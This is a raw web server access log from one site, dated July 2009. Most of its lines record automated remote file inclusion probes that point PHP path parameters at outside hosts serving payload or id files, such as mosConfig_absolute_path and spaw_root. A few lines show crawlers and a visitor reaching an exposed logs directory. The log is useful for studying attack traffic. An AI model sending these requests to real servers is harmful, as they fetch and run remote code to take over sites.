88.199.57.35 - - [31/Jul/2009:13:14:51 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.wirama.com"
174.133.150.130 - - [31/Jul/2009:13:23:41 -0700] "GET /logs/access_090531.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jesusville.co.kr/bots/error.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.wirama.com"
174.133.150.130 - - [31/Jul/2009:13:23:41 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jesusville.co.kr/bots/error.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.wirama.com"
174.133.150.130 - - [31/Jul/2009:13:23:41 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jesusville.co.kr/bots/error.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.wirama.com"
174.133.150.130 - - [31/Jul/2009:13:23:59 -0700] "GET /logs/access_090331.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jesusville.co.kr/bots/error.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.wirama.com"
83.167.62.163 - - [31/Jul/2009:13:24:26 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter/tests); +http://www.exabot.com/go/robot)" "www.wirama.com"
83.167.62.163 - - [31/Jul/2009:13:24:27 -0700] "GET /?D=A HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter/tests); +http://www.exabot.com/go/robot)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:13:25:11 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:13:25:11 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.wirama.com"
174.133.150.130 - - [31/Jul/2009:13:26:32 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jesusville.co.kr/bots/error.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "wirama.com"
174.133.150.130 - - [31/Jul/2009:13:26:32 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.jesusville.co.kr/bots/error.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "wirama.com"
88.199.57.35 - - [31/Jul/2009:13:36:01 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:13:36:01 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.wirama.com"
87.106.60.46 - - [31/Jul/2009:13:37:17 -0700] "GET /logs/access_090401.log//admin/spaw/spaw_control.class.php?spaw_root=http://wellness-card.com/images/smilies/icons/scan/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.106.60.46 - - [31/Jul/2009:13:37:17 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://wellness-card.com/images/smilies/icons/scan/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.106.60.46 - - [31/Jul/2009:13:37:19 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://wellness-card.com/images/smilies/icons/scan/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.106.60.46 - - [31/Jul/2009:13:39:37 -0700] "GET /logs/access_090401.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://wellness-card.com/images/smilies/icons/scan/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
87.106.60.46 - - [31/Jul/2009:13:39:59 -0700] "GET /logs/access_090531.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://wellness-card.com/images/smilies/icons/scan/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
96.242.25.2 - - [31/Jul/2009:13:40:08 -0700] "GET /logs/ HTTP/1.0" 200 2543 "http://www.google.com/search?q=%22index+of%2F%22%2B%22%2Flogs%22&hl=en&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729)" "www.wirama.com"
96.242.25.2 - - [31/Jul/2009:13:40:18 -0700] "GET /access_081231.log HTTP/1.0" 404 275 "http://www.wirama.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729)" "wirama.com"
96.242.25.2 - - [31/Jul/2009:13:40:19 -0700] "GET /access.log HTTP/1.0" 404 275 "http://www.wirama.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729)" "wirama.com"
96.242.25.2 - - [31/Jul/2009:13:40:21 -0700] "GET /access_090731.log HTTP/1.0" 404 275 "http://www.wirama.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729)" "wirama.com"
87.106.60.46 - - [31/Jul/2009:13:45:43 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://wellness-card.com/images/smilies/icons/scan/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.106.60.46 - - [31/Jul/2009:13:45:43 -0700] "GET /logs/access_090601.log//admin/spaw/spaw_control.class.php?spaw_root=http://wellness-card.com/images/smilies/icons/scan/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.106.60.46 - - [31/Jul/2009:13:45:43 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://wellness-card.com/images/smilies/icons/scan/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
87.106.60.46 - - [31/Jul/2009:13:45:53 -0700] "GET /logs/access_090401.log//admin/spaw/spaw_control.class.php?spaw_root=http://wellness-card.com/images/smilies/icons/scan/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.199.57.35 - - [31/Jul/2009:13:46:33 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:13:46:33 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.wirama.com"
80.231.1.2 - - [31/Jul/2009:13:48:31 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://xedu.kit.net/id.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.wirama.com"
80.231.1.2 - - [31/Jul/2009:13:48:31 -0700] "GET /logs/access_090401.log//admin/spaw/spaw_control.class.php?spaw_root=http://xedu.kit.net/id.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.wirama.com"
80.231.1.2 - - [31/Jul/2009:13:48:31 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://xedu.kit.net/id.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.wirama.com"
80.231.1.2 - - [31/Jul/2009:13:49:43 -0700] "GET /logs/access_090531.log//admin/spaw/spaw_control.class.php?spaw_root=http://xedu.kit.net/id.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:13:56:50 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:13:56:50 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.wirama.com"
80.231.1.2 - - [31/Jul/2009:14:00:45 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://xedu.kit.net/id.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "wirama.com"
80.231.1.2 - - [31/Jul/2009:14:00:45 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://xedu.kit.net/id.txt?&mode=id HTTP/1.1" 404 275 "-" "-" "wirama.com"
88.199.57.35 - - [31/Jul/2009:14:07:44 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:14:07:44 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:14:18:13 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:14:18:15 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:14:28:49 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:14:28:49 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.wirama.com"
216.14.123.202 - - [31/Jul/2009:14:29:13 -0700] "GET /logs/access.log/kboard.php?board=sightseeing&cid=1&PageNum=5http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
216.14.123.202 - - [31/Jul/2009:14:29:17 -0700] "GET /logs/kboard.php?board=sightseeing&cid=1&PageNum=5http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
216.14.123.202 - - [31/Jul/2009:14:29:17 -0700] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
216.14.123.202 - - [31/Jul/2009:14:29:23 -0700] "GET /logs/access_090401.log/kboard.php?board=sightseeing&cid=1&PageNum=5http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
216.14.123.202 - - [31/Jul/2009:14:34:00 -0700] "GET /logs/access.log%20/kboard.php?board=sightseeing&cid=1&PageNum=5http://www.balans-arnhem.nl/templates/beez/css/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:14:39:19 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:14:39:19 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.wirama.com"
123.242.165.138 - - [31/Jul/2009:14:44:22 -0700] "GET /logs/?mosConfig_absolute_path=http://lec.chonbuk.ac.kr/bak/fx29id.txt?? HTTP/1.1" 200 2559 "-" "Mozilla/5.0" "wirama.com"
123.242.165.138 - - [31/Jul/2009:14:44:22 -0700] "GET /?mosConfig_absolute_path=http://lec.chonbuk.ac.kr/bak/fx29id.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
123.242.165.138 - - [31/Jul/2009:14:44:22 -0700] "GET /logs/access_090331.log/?mosConfig_absolute_path=http://lec.chonbuk.ac.kr/bak/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.199.57.35 - - [31/Jul/2009:14:49:40 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:14:49:40 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.wirama.com"
66.232.145.150 - - [31/Jul/2009:14:51:25 -0700] "GET /logs///connect.lib.php?g4[path]=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
66.232.145.150 - - [31/Jul/2009:14:51:25 -0700] "GET //connect.lib.php?g4[path]=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
66.232.145.150 - - [31/Jul/2009:14:51:30 -0700] "GET //connect.lib.php?g4[path]=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
66.232.145.150 - - [31/Jul/2009:14:51:30 -0700] "GET /logs///connect.lib.php?g4[path]=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
65.55.106.234 - - [31/Jul/2009:14:52:14 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
66.232.145.150 - - [31/Jul/2009:14:56:11 -0700] "GET /logs/access.log///connect.lib.php?g4[path]=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.232.145.150 - - [31/Jul/2009:14:56:11 -0700] "GET /logs///connect.lib.php?g4[path]=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.232.145.150 - - [31/Jul/2009:14:56:11 -0700] "GET //connect.lib.php?g4[path]=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.232.145.150 - - [31/Jul/2009:14:56:18 -0700] "GET /logs/access.log///connect.lib.php?g4[path]=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.232.145.150 - - [31/Jul/2009:14:56:18 -0700] "GET //connect.lib.php?g4[path]=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.232.145.150 - - [31/Jul/2009:14:56:18 -0700] "GET /logs///connect.lib.php?g4[path]=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:14:59:58 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:14:59:58 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:15:10:24 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:15:10:25 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.wirama.com"
65.55.106.234 - - [31/Jul/2009:15:12:46 -0700] "GET /logs/access_081231.log HTTP/1.1" 200 0 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
88.199.57.35 - - [31/Jul/2009:15:20:46 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:15:20:47 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.wirama.com"
58.61.164.39 - - [31/Jul/2009:15:30:42 -0700] "GET /robots.txt HTTP/1.1" 404 275 "http://www.wirama.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:15:30:58 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:15:30:58 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:15:41:29 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:15:41:29 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:15:51:51 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:15:51:51 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:16:06:41 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.wirama.com"
88.199.57.35 - - [31/Jul/2009:16:06:41 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.twurl.in/id???? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:09:18 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:09:18 -0700] "GET /logs/access_090329.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:09:18 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:10:06 -0700] "GET /logs/access_090501.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:10:21 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:10:21 -0700] "GET /logs/access_090329.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:10:21 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:10:26 -0700] "GET /modules/Forums/errors.php?error=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:10:26 -0700] "GET /logs/access_090501.log//modules/Forums/errors.php?error=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:10:26 -0700] "GET /logs//modules/Forums/errors.php?error=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:10:52 -0700] "GET /modules/Forums/errors.php?error=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:10:52 -0700] "GET /logs//modules/Forums/errors.php?error=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:10:52 -0700] "GET /logs/access_090501.log//modules/Forums/errors.php?error=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:11:10 -0700] "GET /logs/access_090329.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:11:58 -0700] "GET /logs/access_090501.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:13:26 -0700] "GET /logs/access_090329.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:13:26 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:13:26 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
78.110.50.127 - - [31/Jul/2009:16:13:39 -0700] "GET /logs/access_090531.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.wirama.com"
78.110.50.127 - - [31/Jul/2009:16:13:40 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.wirama.com"
78.110.50.127 - - [31/Jul/2009:16:13:40 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/kontol.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:13:58 -0700] "GET /logs/access_090501.log%20%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:14:40 -0700] "GET /logs/errors.php?error=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:14:40 -0700] "GET /logs/access_090329.log%20%20/errors.php?error=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:14:40 -0700] "GET /errors.php?error=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:15:43 -0700] "GET /logs/access_090329.log%20%20/errors.php?error=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:15:43 -0700] "GET /logs/errors.php?error=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:15:43 -0700] "GET /errors.php?error=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
190.144.44.36 - - [31/Jul/2009:16:15:45 -0700] "GET /errors.php?error=http://billing.crazyhostguy.com//include/scripts/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
